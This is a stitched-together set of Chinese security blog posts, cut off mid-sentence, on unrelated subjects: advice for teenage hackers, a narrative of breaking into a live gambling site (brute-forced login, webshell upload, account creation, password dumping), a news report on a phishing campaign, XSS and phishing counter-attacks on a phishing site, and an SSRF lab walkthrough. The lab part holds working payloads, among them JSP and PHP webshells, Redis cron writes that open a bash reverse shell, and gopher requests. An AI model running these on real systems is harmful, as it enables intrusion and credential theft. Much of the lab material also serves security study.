排行榜

只有十几岁，能不能学黑客技术或网络安全？ 成为一个黑客，是很多人心里的梦，有的人只是想想，有的人付出行动。可以说不少爱好者都有这个想法，但是年龄太小，也不知道该不该学，接下来小风教程网给你几点建议！ 1、学业不可弃放弃学业去学习一项技术，相信这种人已经越来越少了，现在不是以前，九年义务也是免费的，十多岁就放弃学业，这显然是不理智的，我们都见过很多小学或初中就出来工作，我们不敢说肯定，都是大部分人都是去工厂打工，一个月三四千是普遍情况，但是离开了工厂，他们在社会没有任何竞争力，也只能做一些吃苦的工作。所以啊，无论你多热爱某个技术和爱好，黑客技术也好，你都不应该放弃你的学业。可以在学习时间有闲暇时做自己的爱好，但是还是要学习为主。等上了大学就可以好好学你热爱的技术，甚至参加黑客ctf大赛。 2、大多黑客都是十多岁开始学习也许你觉得年龄小学东西又笨又慢，但是实际上大部分的黑客都是十几岁就有很强的学习能力，对计算机也很有专研精神，比成年人有更大的优势，因为这个年龄学黑客技术，纯粹是爱好，没有目的。你能想象出，早期的互联网盗号软件，刷钻教程，网页钓鱼基本上都是十五六岁的人干的么，虽然他们有违法的成分，但是不可否认他们都是靠自己的学习能力学会的。媒体喜欢炒作一些13岁黑客天才之类的报道，实际上这种人中国非常多，太多了，而且在看这篇文章的人就有很多是这样的人。 3、了解真正的黑客并不是黑客电影电影里的黑客无所不能，现实中的黑客并不是这样的，他们找漏洞很厉害，常常做出一些惊人的举动，但是他们往往也被防火墙虐的遍体鳞伤。现实的黑客要学什么，未来要做一个什么样的人，对社会有没有帮助，都是要考虑的。 4、永远不要说自己是黑客 有的人还没入门，会个小操作就想装逼了。很多人好奇，为什么不要说自己是黑客，是不是怕暴露自己，其实不是，听我分析。 如果你和不懂技术的人说你是黑客，他会有什么反应？肯定说那你盗个号我看看，你给我修改下钱包余额，你帮我修下电脑等等，或者一有问题就想找你帮忙，你想想，这些要求是不是违法的？而且对方说的要求往往很离谱，无法实现，你八成也不会，不会还丢人，所以这个b不要乱装，只会给自己添乱。 如果跟懂技术的人说你是黑客，那你会非常尴尬，为什么所谓的黑客教父，中国黑客高手排名，黑客保家卫国的故事，圈内人都很鄙视呢？因为这是什么都不懂的小编瞎写的，然后小白又喜欢看，但是你问问懂的人，可能直接笑喷！在cmd里输入dir /s，实际上就是一个简单的列出电脑全部文件的命令，有人拍成抖音黑客操作，就有几万评论，很多小白直呼黑客大神，程序员看了表示懵逼，黑客看了流泪。实在不懂这和黑客有什么关系。所以学技术前想清楚要虚荣心还是要真实力。

前言 由于之前网站数据丢失了，发一个之前渗透过的博彩网站记录给大家看看吧。 没事打开电脑开始瞎逛，但是无意间发现之前渗透的非法网站又开起来了，但是只是一个宝塔页面，没有任何价值，于是在同ip下发现一个博彩网站，随之展开渗透 一、信息收集 1.以下由tfxxx来代替域名 锁定网站：tfxxx.com 2.查看服务器ip以及判断是否有cdn 这个没有cdn，很nice 3.目录扫描 总体来说，并没有得到什么有用的价值 4.二级域名扫描 不错，得到了一个后台 admin.tfxxx.com，留着待会看 5.端口扫描 全端口扫描，这里就不截图了，扫的太慢了，基本上也没有啥利用的，远程端口更改了，扫出来的是20119端口 二、漏洞探测 1.后台页面 通过上面收集的信息来说，还是比较局限，先不管吧，有一个后台，就来尝试一下后台登录，看是否ok 2.猜账户 随手一个admin，进入到输入密码和安全码的页面，输入其他账号会提示用户名不正确，所以这里判断账号为：admin 3.爆破安全码 这里开始爆破安全码，因为进入到这个界面随便输入一个安全码它会提示安全码不正确，所以我在想如果把安全码输入正确了密码不对，它是不是只会提示密码错误？怀着这个问题用burp来爆破看看 通过URL解码，然后在网站后台登录看看，既然这样提示了，那应该是验证了我的想法，所以这里判断安全码为：123456 4.爆破密码 既然有了用户名和安全码，那就试着来爆破一下密码，最终最终！弱口令啊，YYDS！！密码：qwe123456 成功登录 三、漏洞利用 1.文件上传 来到后台开始寻找是否有上传的地方或者其他能getshell的地方，找到一个上传点，抓包，提示上传失败 然后试着把Content-Type：application/octet-stream改成Content-Type: image/jpg，万万没想到这么顺利，直接上传成功 2.蚁剑连接 找到刚才的小马地址，成功连接 四、提权 1.尝试突破命令限制 其实这里已经是system权限了，但是蚁剑和菜刀都无法执行命令，尝试了各种办法突破都未果，还是我太菜了 2.使用sys_eval函数 这里使用udf提权的方式，将sys_eval引入进去，然后完成执行添加账户，在加入用户组，我不能执行sys_exec不知道为啥... select sys_eval('net user admin 123456 /add'); 成功登录桌面 3.获取管理员密码 wce下载 这里使用wce获取管理员明文密码，掌握到常用密码，可以进一步掌握这人的信息，大家都懂哈 查看当前登录的用户及加密的密码 wce-universal.exe -l 查看当前用户登录的详细信息 wce-universal.exe -lv 查看明文信息 wce-universal -w thehackerworld版权所有，转载请注明出处。【原创】

一项新的有针对性的网络钓鱼活动已将注意力集中在印度政府官员使用的名为Kavach的双因素身份验证解决方案上。 网络安全公司 Securonix 将此次活动命名为STEPPY#KAVACH，根据与先前攻击的战术重叠，将其归因于名为 SideCopy 的威胁行为者。 “.LNK 文件用于启动代码执行，最终下载并运行恶意 C# 有效负载，其功能类似于远程访问木马 (RAT)，”Securonix 研究人员 Den Iuzvyk、Tim Peck 和 Oleg Kolesnikov在一份新报告中表示。 SideCopy 是一个据信来自巴基斯坦的黑客团队，至少从 2019 年开始活跃，据说与另一个名为Transparent Tribe（又名 APT36 或 Mythic Leopard）的演员有联系。 众所周知，它还模仿 SideWinder 利用的攻击链，SideWinder是一个多产的民族国家组织，不成比例地挑出巴基斯坦的军事实体，以部署自己的工具集。 也就是说，这并不是 Kavach 第一次成为演员的目标。2021 年 7 月，Cisco Talos 详细介绍了一项窃取印度政府雇员凭证的间谍活动。 自今年年初以来，以 Kavach 为主题的诱饵应用程序已被 Transparent Tribe 用于针对印度的攻击。 Securonix 在过去几周观察到的最新攻击序列需要使用网络钓鱼电子邮件引诱潜在受害者打开快捷方式文件 (.LNK)，以使用mshta.exe Windows 实用程序执行远程 .HTA 负载。 该公司表示，该 HTML 应用程序“被发现托管在一个可能遭到入侵的网站上，嵌套在一个不起眼的‘画廊’目录中，该目录旨在存储该网站的一些图像。” 受感染的网站是 incometaxdelhi[.]org，它是印度德里地区所得税部门的官方网站。门户网站上不再提供恶意文件。 在下一阶段，运行 .HTA 文件会导致执行混淆的 JavaScript 代码，该代码旨在显示诱饵图像文件，该文件包含印度国防部一年前 2021 年 12 月的公告。 JavaScript 代码进一步从远程服务器下载可执行文件，通过 Windows 注册表修改建立持久性，并重新启动机器以在启动后自动启动二进制文件。 就其本身而言，二进制文件充当后门，使威胁参与者能够执行从攻击者控制的域发送的命令、获取和运行其他有效负载、截取屏幕截图以及泄露文件。 渗出组件还包括一个选项，用于专门搜索 Kavach 应用程序在系统上创建的数据库文件（“kavach.db”）以存储凭据。 值得注意的是，上述感染链是由MalwareHunterTeam在2022年12月8日的一系列推文中披露的，将远程访问木马描述为MargulasRAT。 研究人员说：“根据从威胁行为者使用的 RAT 获得的二进制样本的相关数据，该活动一直在针对去年未被发现的印度目标进行。”

前几天看到 B 站 up 主公孙田浩投稿的视频「QQ 被盗后发布赌博广告，我一气之下黑了他们网站」，看完后不禁感叹为啥自己没有那么好的运气…… 实际上这就是一个中规中矩的 XSS 漏洞案例，在安全圈子里面应该也算是基本操作，正好博客以前没有记录过类似的文章，那么本文就来还原一下这个攻击过程。 鉴别网站 下面是一个经典的 QQ 空间钓鱼网站： 域名分析 钓鱼网站最直观的就是看域名，可以看到目标网站域名 ：qq.xps.com 尽管域名中出现了 qq 字样，但是一级域名却是 xps.com 这一点就直接暴露了钓鱼网站的本性。 早期还有一种利用拉丁字母注册的域名伪造钓鱼网站的案例，这种就比较逼真了，下面国光简单列举一些： OPPO 官网 真假域名 BASH # 真域名 www.oppo.com # 假域名 www.οppο.com Pornhub 官网真假域名 BASH # 真域名 www.pornhub.com # 假域名 www.ρornhub.com 唯品会官网 真假域名 BASH # 真域名 www.vip.com # 假域名 www.νip.com 关于这类域名就不再列举了，早期这种方法成功率是非常的高的，有时候甚至都可以欺骗到我们这种专业的信息安全从业者。 功能分析 钓鱼网站既然是要钓鱼的话，说那么多半还会有后台管理功能。所以使用常规的目录扫描工具多半可以扫描出一些端倪出来： BASH dirsearch -u "http://qq.xps.com/" -e * -x 301 果然扫描出了这个 QQ 空间钓鱼网站的后台登录口了：http://qq.xps.com/admin/login.php 至此基本上已经可以确定这个目标网站就是传说中的钓鱼网站了，下面来看一下这个钓鱼网站是如何运作的吧。 钓鱼流程 小白用户前台输入自己的 QQ 账号和密码信息，点击登录后域名跳转到真正的 QQ 官网： 然后用户再输入自己的 QQ 账号和密码就可以成功登陆了。 目前很多钓鱼网站都是这种思路，这可以让被钓者产生一种自己第一次是密码不小心输入错误的错觉，从而放松警惕，妙啊！真是妙蛙种子吃着妙脆角，妙进了米奇妙妙屋 妙到家了 然后钓鱼网站的管理员每天会到自己的 QQ 空间钓鱼管理中心里面看看今天又有哪些菜鸡上钩了： 可以看到上钩者的 QQ 号为：1314520 密码为：sbhac… 唉，不对劲？貌似自己被羞辱了一番…… 攻击思路 本文主要是来梳理一下 XSS 常剑的攻击思路，关于 XSS 以为的思路不在本文的叙述范围内，另外如果有小伙伴要不错新的姿势的话欢迎评论区里面或者邮件留言，国光日后会继续完善本文的。 思路一：XSS 盲打 如果目标网站存在 XSS 的话且没有 httponly 防御 cookie 那么就可以直接盲打 XSS。首先准备一个 XSS 靶场，国光这里比较推荐 Github 上面开源的蓝莲花 XSS 平台。 官方项目地址为：https://github.com/firesunCN/BlueLotus_XSSReceiver 可惜已经清空数据了，还好国光我 fork 了一份： 国光 fork 的项目地址为：https://github.com/sqlsec/BlueLotus_XSSReceiver 然后使用 XSS 平台里面的模块来生成一个 XSS payload： JAVASCRIPT <script src="http://10.20.24.244/xss/myjs/x.js"></script> 可以去掉多余的双引号： JAVASCRIPT <script src=http://10.20.24.244/xss/myjs/x.js></script> 然后回到钓鱼网站前台，在用户名或者密码出插入 payload（理论上来说 密码处成功率要高一点），如果有表单长度限制的话，可以手工审查元素修改 input 的长度限制： 这样黑客攻击的步骤基本上就走完了，下面回到钓鱼网站管理员的视角。 钓鱼网站的搭建者到自己的 QQ 空间钓鱼管理中心里面看看今天又有哪些菜鸡上钩了： 发现真的有菜鸡上钩，密码居然是 1111111111 嘴角忍不住上仰。 此时他不知道的是，用户账号旁边实际上有一串 JS 代码被解析了，而此时黑客在 XSS 平台里面可以直接看到管理员已经上钩了： 可以直接看到管理员的后台地址和 cookie 信息，拿到后台地址和 Cookie 信息就可以直接抓包替换 Cookie 登录到钓鱼网站的后台，这些基本操作国光我就不在啰嗦了，下面来说一下另一种思路。 思路二：SET 钓鱼 假设目标网站存在 httppnly 的话，我们拿到的 cookie 信息也是不完整的，所以传统的思路是行不通的，这种情况下该怎么办呢？仔细想想，既然不能正面肛 httponly 的话，那么为什么不考虑绕过他呢？ 下面国光主要描述一下如何使用 Kali Linux 里面的 set 社工工程学工具包来进行钓鱼。 SET 在 Kali Linux 里面的全称是 social engineering toolkit： Github 项目地址为：https://github.com/trustedsec/social-engineer-toolkit 点击即可直接启动，首先会看到如下的菜单： BASH Select from the menu: 1) Social-Engineering Attacks # 社会工程攻击 2) Penetration Testing (Fast-Track) # 渗透测试（快速通道） 3) Third Party Modules # 第三方模块 4) Update the Social-Engineer Toolkit # 更新 SET 5) Update SET configuration # 更新 SET 配置 6) Help, Credits, and About # 帮助 99) Exit the Social-Engineer Toolkit # 退出 set> 1 选择 1 后进入到下面的菜单： BASH Select from the menu: 1) Spear-Phishing Attack Vectors # 鱼叉式网络钓鱼攻击 2) Website Attack Vectors # 网站攻击 3) Infectious Media Generator # 感染性介质生成 4) Create a Payload and Listener # 创建 Payload 和 监听器 5) Mass Mailer Attack # 群发邮件 6) Arduino-Based Attack Vector # 基于 Arduino 的攻击 7) Wireless Access Point Attack Vector # 无线接入点攻击 8) QRCode Generator Attack Vector # 二维码生成器攻击 9) Powershell Attack Vectors # Powershell 攻击 10) Third Party Modules # 第三方模块 99) Return back to the main menu. # 返回主菜单 set> 2 选择 2 后进入到下面的菜单： BASH 1) Java Applet Attack Method # Java Applet 攻击 2) Metasploit Browser Exploit Method # Metasploit Browser 浏览器攻击 3) Credential Harvester Attack Method # 凭证窃取攻击 4) Tabnabbing Attack Method # 标签页劫持 5) Web Jacking Attack Method # 网页劫持攻击 6) Multi-Attack Web Method # 综合网页攻击 7) HTA Attack Method # HTA 攻击 99) Return to Main Menu # 返回主菜单 set:webattack> 3 选择 3 进入到下面的菜单： BASH 1) Web Templates # 网站模板 2) Site Cloner # 站点克隆 3) Custom Import # 自定义导入 99) Return to Webattack Menu # 返回主菜单 set:webattack> 2 选择 2 然后具体看下下面的操作： 这个时候一个假的钓鱼网站就制作完成了，访问 Kali Linux 的 80 端 10.20.25.39 效果如下： 这个登录入口和 qq.xps.com/admin/login.php 的登录口一模一样： 现在的任务就是想办法让管理员在假的网站里面输入网站的后台用户名和密码信息，那么该怎么诱导管理员点击呢？对，聪明的网友肯定想到了，还是利用 XSS，准备下方的 payload，这个 XSS 的作用就是普通的链接跳转： JAVASCRIPT <script>window.location.href="http://10.20.25.39/"</script> 然后将这个 payload 插入到钓鱼网站的后台中： 此时管理员到自己的 QQ 空间钓鱼管理中心里面看看今天又有哪些菜鸡上钩了，结果没想到网站浏览器却跳转到了：10.20.25.39 页面，这个就是我们制作的假的 QQ 空间钓鱼管理中心的登录界面。 如果管理员大意的话，这个时候会以为登录会话超期了，需要重新登录，就在我们假的网站后台里面输入了真正的密码： 我们这个假的网站也非常妙，登录后自动转发到正确的网站登录成功，真是学以致用呀～～ 管理员放松警惕的同时，我们的 Kali Linux 里也窃取到管理员的明文账号和密码信息了： 拿到这个后台就可以成功登陆了，Bingo ~ 当然如果管理员是一个有很高安全意识的人，可能是不会上当的，本案例仅供意淫参考使用，实际运用还是得看运气。 思路三：Flash 钓鱼 这也是 B 站 视频里面提到过的方法，首先我们需要准备一个钓鱼页面，这里在 Github 上搜索到了 2 个 相关的项目，下面分别展示一下： 项目地址：https://github.com/Wileysec/adobe-flash-phishing-page 模仿的 Flash Player 中文官网的页面 项目地址： https://github.com/r00tSe7en/Flash-Pop 这种的就要稍微激进一点，强迫症都会忍不住去点击下载的： 国光这里选择了第 2 种激进的方法，点击立即升级的这个按钮点击会下载好国光我准备好的 CS 木马。如果管理员以为自己的 Flash 版本过低的话，可能会下载并运行这个木马： 这里偷懒了没有给 Flash.exe 添加图标伪造一下，关于图标伪造大家可以参考之前的文章： 为 Cobalt Strike exe 木马添加图标 如果顺利的话就会成功上线 CS： 思路四：CS 钓鱼 补充一个思路，除了使用 Kali 里面的 SET 来构建钓鱼网站，使用 Cobalt Strike 也是可以轻松构建出一个钓鱼网站的，操作也比较简单： 「攻击」-「钓鱼攻击」-「克隆网站」： 具体的配置如下，记得勾选键盘记录： 接着访问 8022 端口发现的确克隆成功： 然后和上面思路一样，借助 XSS 强制让目标人员访问到我们的这个 CS 模仿的网站。如果成功的话，在 Web 日志的控制台里面可以看到被钓鱼者的键盘明文记录的： 总结 免责声明：本文出现的思路案例仅供网络安全学习和研究技术使用，禁止使用本博客的黑客技术工具用于非法用途，否则后果自负，另外文中所使用的 QQ 空间钓鱼网站是人为修改的漏洞靶场 总的来说国光认为 XSS 实战的套路大体上就这些，日后如果有新的姿势的话，会考虑到继续完善更新这篇文章的。 本文可能实际上也没有啥技术含量，但是写起来还是比较浪费时间的，在这个喧嚣浮躁的时代，个人博客越来越没有人看了，写博客感觉一直是用爱发电的状态。如果你恰巧财力雄厚，感觉本文对你有所帮助的话，可以考虑打赏一下本文，用以维持高昂的服务器运营费用（域名费用、服务器费用、CDN 费用等）

SSRF 以前没有单独总结过相关的姿势点，去年的时候国光就已经写了一大半了，但是后面由于经常赶项目的原因，所以这篇文章就拖延到今天才发布，感觉这个版本还是比较完善的（实际上还有几个坑没有填 但是搞这么细有啥意义呢，真正的内网当中 SSRF 打穿还是很有难度的）。 靶场拓扑设计 首先来看下本次靶场的设计拓扑图： 先理清一下攻击流程，172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞，并且 80 端口映射到了公网的 8080，此时攻击者通过这个 8080 端口可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。 本场景基本上覆盖了 SSRF 常见的攻击场景，实际上 SSRF 还可以攻击 FTP、Zabbix、Memcached 等应用，由于时间和精力有限，先挖个坑，以后有机会的话再补充完善这套 SSRF 攻击场景的。 x.x.x.x:8080 - 判断 SSRF 是否存在 能够对外发起网络请求的地方，就可能存在 SSRF。首先看下目标站点的功能，获取站点快照： 先尝试获取外网 URL 试试看，测试一下经典的 百度 robots.txt： 测试成功，网站请求了 Baidu 的 robots.txt 文件了，并将请求页面的内容回显到了网站前端中。那么接下来尝试获取内网 URL 看看，测试请求 127.0.0.1 看看会有什么反应： 测试依然成功，网站请求了 127.0.0.1 的 80 端口 ，也就是此可我们浏览的界面，所以我们就看到了图片上的 “套娃” 现象。 通过以上两次请求，已经基本上可以确定这个输入框就是传说中的 SSRF 的漏洞点了，即没有对用户的输入进行过滤，导致可以用来发起任意的内网或者外网的请求。 172.72.23.21 - SSRF 获取本地信息 FILE 协议获取本地信息 既然当前站点存在 SSRF 的话，我们可以尝试配合 file 协议来读取本地的文件信息，首先尝试使用 file 协议来读取 /etc/passwd 文件试试看： PAYLOAD file:///etc/passwd 成功读取到了本地的文件信息，现在尝试来获取存在 SSRF 漏洞的本机内网 IP 地址信息，确认当前资产的网段信息： PAYLOAD file:///etc/hosts 可以判断当前机器的内网地址为 172.23.23.21，那么接下来就可以对这个内网资产段进行信息收集了。 权限高的情况下还可以尝试读取 /proc/net/arp 或者 /etc/network/interfaces 来判断当前机器的网络情况 172.72.23.1/24 - SSRF 探测内网端口 SSRF 常配合 DICT 协议探测内网端口开放情况，但不是所有的端口都可以被探测，一般只能探测出一些带 TCP 回显的端口，具体可以探测哪些端口需要大家自己动手去测试一下，BP 下使用迭代器模式爆破，设置好要爆破的 IP 和 端口即可批量探测出端口开放的信息： 通过爆破可以轻易地整理出端口的开放情况： CODE 172.72.23.21 - 80 172.72.23.22 - 80 172.72.23.23 - 80、3306 172.72.23.24 - 80 172.72.23.25 - 80 172.72.23.26 - 8080 172.72.23.27 - 6379 172.72.23.28 - 6379 172.72.23.29 - 3306 对照下拓扑图，端口开放信息都是一一匹配的，信息收集完毕，那么接下来就开始只使用最外部的 SSRF 来打穿内网吧。 除了使用 DICT 协议探测端口以外，还可以使用正常的 HTTP 协议获取到内网中 Web 应用的信息情况，这里就不再赘述了。 172.72.23.22 - 代码注入 代码注入应用详情 本版块属于上帝视角，主要作用是给读者朋友们展示一下应用本身正常的功能点情况，这样后面直接使用 SSRF 来攻击的话，思路就会更加清晰明了。 index.php 一个正常的提示页面，啥都没有： phpinfo.php 凑数勉强算是一个敏感文件吧： shell.php 一个经典的 system 一句话木马： SSRF 之目录扫描 如果想要利用 SSRF 漏洞对内网 Web 资产进行目录扫描的话，使用传统的 dirsearch 等工具就不是很方便了，国光在这种场景下使用的是 Burpsuite 抓包，然后导入字典批量遍历路径参数，请求包如下： 使用 Burpsuite 自带的 Grep - Extract 可以快速地筛选页面正则匹配的结果，很明显这个 172.72.23.22 的内网站点下面还存在着 phpinfo.php 和 shell.php： SSRF 之代码注入 因为这个一句话 webshell 使用了 GET 来接受请求，所以可以直接使用 SSRF 的 HTTP 协议来发起 GET 请求，直接给 cmd 参数传入命令值，导致命令直接执行： 使用浏览器提交请求的话，空格得写成 %20 才可以顺利执行命令 ： 从 hosts 文件的结果可以看出，当前我们已经拿下了内网 172.72.23.22 这台机器的权限了。 如果从 BP 里面抓包请求的话，空格得写成 %2520，即两次 URL 编码才可以顺利执行命令： 172.72.23.23 - SQL 注入 SQL 注入应用详情 本版块属于上帝视角，主要作用是给读者朋友们展示一下应用本身正常的功能点情况，这样后面直接使用 SSRF 来攻击的话，思路就会更加清晰明了。 基础的联合查询注入，可以直接带出数据库的相关信息： 同时也预设了一个 flag，同样通过联合查询也可以简单的查询出 flag 的值： 因为管理员（国光）不小心（故意）给网站目录设置了 777 权限，所以这里可以尝试通过 MySQL 的 INTO DUMPFILE 直接往网站的目录下写 shell，最终借助 SQL 注入的 UNION 注入来执行写 shell 的 SQL 语句 payload 如下： 成功写 shell 后，浏览器直接访问执行命令看看： SSRF 之 SQL 注入 利用 SSRF 来注入内网中存在 SQLI 的资产的话，和上一个小节的 GET 型注入差不多，只要注意一些编码细节即可。 SSRF 之基础的联合查询注入，可以直接带出数据库的相关信息，和正常注入差不多，只需要将空格进行两次 URL 编码即可： 同理直接注入出数据库中的 flag： 往网站的目录写通过 SQL 语句来写 shell： 写入 shell 成功后尝试直接来命令执行： 172.72.23.24 - 命令执行 命令执行应用详情 本版块属于上帝视角，主要作用是给读者朋友们展示一下应用本身正常的功能点情况，这样后面直接使用 SSRF 来攻击的话，思路就会更加清晰明了。 172.72.23.24 是一个经典的命令执行，通过 POST 方式攻击者可以随意利用 Linux 命令拼接符 ip 参数，从而导致任意命令执行： SSRF 之命令执行 这种场景和之前的攻击场景稍微不太一样，之前的代码注入和 SQL 注入都是直接通过 GET 方式来传递参数进行攻击的，但是这个命令执行的场景是通过 POST 方式触发的，我们无法使用使用 SSRF 漏洞通过 HTTP 协议来传递 POST 数据，这种情况下一般就得利用 gopher 协议来发起对内网应用的 POST 请求了，gopher 的基本请求格式如下： gopher 协议是一个古老且强大的协议，从请求格式可以看出来，可以传递最底层的 TCP 数据流，因为 HTTP 协议也是属于 TCP 数据层的，所以通过 gopher 协议传递 HTTP 的 POST 请求也是轻而易举的。 首先来抓取正常情况下 POST 请求的数据包，删除掉 HTTP 请求的这一行： PAYLOAD Accept-Encoding: gzip, deflate 如果不删除的话，打出的 SSRF 请求会乱码，因为被两次 gzip 编码了。 接着在 Burpsuite 中将本 POST 数据包进行两次 URL 编码： 两次 URL 编码后的数据就最终的 TCP 数据流，最终 SSRF 完整的攻击请求的 POST 数据包如下： 可以看到通过 SSRF 成功攻击了 172.72.23.24 的命令执行 Web 应用，顺利执行了 cat /etc/hosts 的命令： 172.72.23.25 - XML 实体注入 XXE 应用详情 本版块属于上帝视角，主要作用是给读者朋友们展示一下应用本身正常的功能点情况，这样后面直接使用 SSRF 来攻击的话，思路就会更加清晰明了。 本场景是一个基础的 XXE 外部实体注入场景，登录的时候用户提交的 XML 数据，且服务器后端对 XML 数据解析并将结果输出，所以可以构造一个 XXE 读取本地的敏感信息： 下面是 XXE 攻击的效果图： SSRF 之 XXE 和上一个场景 172.72.23.24 的命令执行类似，这里 XXE 也是通过在 POST 数据包里面构造 Payload 来进行攻击的，所以依然先来抓取正常情况下 XXE 攻击的 POST 请求的数据包，删除掉 Accept-Encoding 这一行，然后使用 Burpsuite 对 POST 数据包进行两次 URL 编码： 两次 URL 编码后的数据就最终的 TCP 数据流，最终 SSRF 完整的攻击请求的 POST 数据包如下： 可以看到通过 SSRF 成功攻击了 172.72.23.25 的 XXE Web 应用，顺利执行了 cat /etc/hosts 的命令： 172.72.23.26 - CVE-2017-12615 Tomcat 应用详情 本场景是一个 Tomcat 中间件，存在 CVE-2017-12615 任意写文件漏洞，这在 Tomcat 漏洞历史中也是比较经典第一个，国光这里不再赘述，没有复现的同学可以参考 vulhub 的靶场来复现次漏洞：Tomcat PUT 方法任意写文件漏洞（CVE-2017-12615） SSRF 之 CVE-2017-12615 和之前的场景类似，国光这里不再赘述了，所以这部分写的比较简略一些。准备一个 JSP 一句话： JAVA <% String command = request.getParameter("cmd"); if(command != null) { java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1) { out.println(new String(b)); } out.print("</pre>"); } else { out.print("format: xxx.jsp?cmd=Command"); } %> 将原本攻击的 POST 数据包： 将个 POST 请求二次 URL 编码，最后通过 SSRF 发起这个 POST 请求，返回 201 状态码表示成功写 shell： 接着通过 SSRF 发起对 shell.jsp 的 HTTP 请求，成功执行了 cat /etc/hosts 的命令： 172.72.23.27 - Redis 未授权 Redis unauth 应用详情 内网的 172.72.23.27 主机上的 6379 端口运行着未授权的 Redis 服务，系统没有 Web 服务（无法写 Shell），无 SSH 公私钥认证（无法写公钥），所以这里攻击思路只能是使用定时任务来进行攻击了。常规的攻击思路的主要命令如下： BASH # 清空 key flushall # 设置要操作的路径为定时任务目录 config set dir /var/spool/cron/ # 设置定时任务角色为 root config set dbfilename root # 设置定时任务内容 set x "\n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1\n" # 保存操作 save SSRF 之 Redis unauth SSRF 攻击的话并不能使用 redis-cli 来连接 Redis 进行攻击操作，未授权的情况下可以使用 dict 或者 gopher 协议来进行攻击，因为 gopher 协议构造比较繁琐，所以本场景建议直接使用 DICT 协议来攻击，效率会高很多，DICT 协议除了可以探测端口以外，另一个奇技淫巧就是攻击未授权的 Redis 服务，格式如下： BASH dict://x.x.x.x:6379/<Redis 命令> 通过 SSRF 直接发起 DICT 请求，可以成功看到 Redis 返回执行完 info 命令后的结果信息，下面开始直接使用 dict 协议来创建定时任务来反弹 Shell： BASH # 清空 key dict://172.72.23.27:6379/flushall # 设置要操作的路径为定时任务目录 dict://172.72.23.27:6379/config set dir /var/spool/cron/ # 在定时任务目录下创建 root 的定时任务文件 dict://172.72.23.27:6379/config set dbfilename root # 写入 Bash 反弹 shell 的 payload dict://172.72.23.27:6379/set x "\n* * * * * /bin/bash -i >%26 /dev/tcp/x.x.x.x/2333 0>%261\n" # 保存上述操作 dict://172.72.23.27:6379/save SSRF 传递的时候记得要把 & URL 编码为 %26，上面的操作最好再 BP 下抓包操作，防止浏览器传输的时候被 URL 打乱编码 在目标系统上创建定时任务后，shell 也弹了出来，查看下 cat /etc/hosts 的确是 172.72.23.27 这台内网机器： 172.72.23.28 - Redis 有认证 Redis auth 应用详情 本版块属于上帝视角，主要作用是给读者朋友们展示一下应用本身正常的功能点情况，这样后面直接使用 SSRF 来攻击的话，思路就会更加清晰明了。 该 172.72.23.28 主机运行着 Redis 服务，但是有密码验证，无法直接未授权执行命令： 不过除了 6379 端口还开放了 80 端口，是一个经典的 LFI 本地文件包含，可以利用此来读取本地的文件内容： 因为 Redis 密码记录在 redis.conf 配置文件中，结合这个文件包含漏洞点，那么这时来尝试借助文件包含漏洞来读取 redis 的配置文件信息，Redis 常见的配置文件路径如下： PAYLOAD /etc/redis.conf /etc/redis/redis.conf /usr/local/redis/etc/redis.conf /opt/redis/ect/redis.conf 成功读取到 /etc/redis.conf 配置文件，直接搜索 requirepass 关键词来定位寻找密码： 拿到密码的话就可以正常和 Redis 进行交互了： SSRF 之 Redis auth 首先借助目标系统的 80 端口上的文件包含拿到 Redis 的密码：P@ssw0rd 有密码的话先使用 dict 协议进行密码认证看看： 但是因为 dict 不支持多行命令的原因，这样就导致认证后的参数无法执行，所以 dict 协议理论上来说是没发攻击带认证的 Redis 服务的。 那么只能使用我们的老伙计 gopher 协议了，gopher 协议因为需要原生数据包，所以我们需要抓取到 Redis 的请求数据包。可以使用 Linux 自带的 socat 命令来进行本地的模拟抓取： 命令来进行本地的模拟抓取： BASH socat -v tcp-listen:4444,fork tcp-connect:127.0.0.1:6379 此时使用 redis-cli 连接本地的 4444 端口： BASH ➜ ~ redis-cli -h 127.0.0.1 -p 4444 127.0.0.1:4444> 服务器接着会把 4444 端口的流量接受并转发给服务器的 6379 端口，然后认证后进行往网站目录下写入 shell 的操作： BASH # 认证 redis 127.0.0.1:4444> auth P@ssw0rd OK # 清空 key 127.0.0.1:4444> flushall # 设置要操作的路径为网站根目录 127.0.0.1:4444> config set dir /var/www/html # 在网站目录下创建 shell.php 文件 127.0.0.1:4444> config set dbfilename shell.php # 设置 shell.php 的内容 127.0.0.1:4444> set x "\n<?php eval($_GET[1]);?>\n" # 保存上述操作 127.0.0.1:4444> save 与此同时我们还可以看到详细的数据包情况，下面来记录一下关键的流量情况： 可以看到 Redis 的流量并不难理解，可以根据上图橙色标记的注释来理解一下，接下来整理出关键的请求数据包如下： PAYLOAD *2\r $4\r auth\r $8\r P@ssw0rd\r *1\r $8\r flushall\r *4\r $6\r config\r $3\r set\r $3\r dir\r $13\r /var/www/html\r *4\r $6\r config\r $3\r set\r $10\r dbfilename\r $9\r shell.php\r *3\r $3\r set\r $1\r x\r $25\r \r *1\r $4\r save\r 可以看到每行都是以 \r 结尾的，但是 Redis 的协议是以 CRLF (\r\n) 结尾，所以转换的时候需要把 \r 转换为 \r\n，然后其他全部进行 两次 URL 编码，这里借助 BP 就很容易解决： 最后放到 SSRF 的漏洞点进行请求： 执行成功的话会在 /var/www/html 根目录下写入 shell.php 文件，密码为 1，那么下面借助 SSRF 漏洞来试试看： PAYLOAD http://172.23.23.28/shell.php?1=phpinfo(); 成功 getshell，那么消化吸收一下，下面尝试使用 SSRF 来攻击 MySQL 服务吧。 172.72.23.29 - MySQL 未授权 MySQL 应用详情 MySQL 空密码可以登录，靶场在数据库下和系统下各放了一个 flag，通过 SSRF 可以和数据库进行交互，SSRF 进行 UDF 提权可以拿到系统下的 flag： SSRF 之 MySQL 未授权 获取原始数据包 MySQL 需要密码认证时，服务器先发送 salt 然后客户端使用 salt 加密密码然后验证；但是当无需密码认证时直接发送 TCP/IP 数据包即可。所以这种情况下是可以直接利用 SSRF 漏洞攻击 MySQL 的。因为使用 gopher 协议进行攻击需要原始的 MySQL 请求的 TCP 数据包，所以还是和攻击 Redis 应用一样，这里我们使用 tcpdump 来监听抓取 3306 的认证的原始数据包： BASH # lo 回环接口网卡 -w 报错 pcapng 数据包 tcpdump -i lo port 3306 -w mysql.pcapng 然后本地使用 MySQL 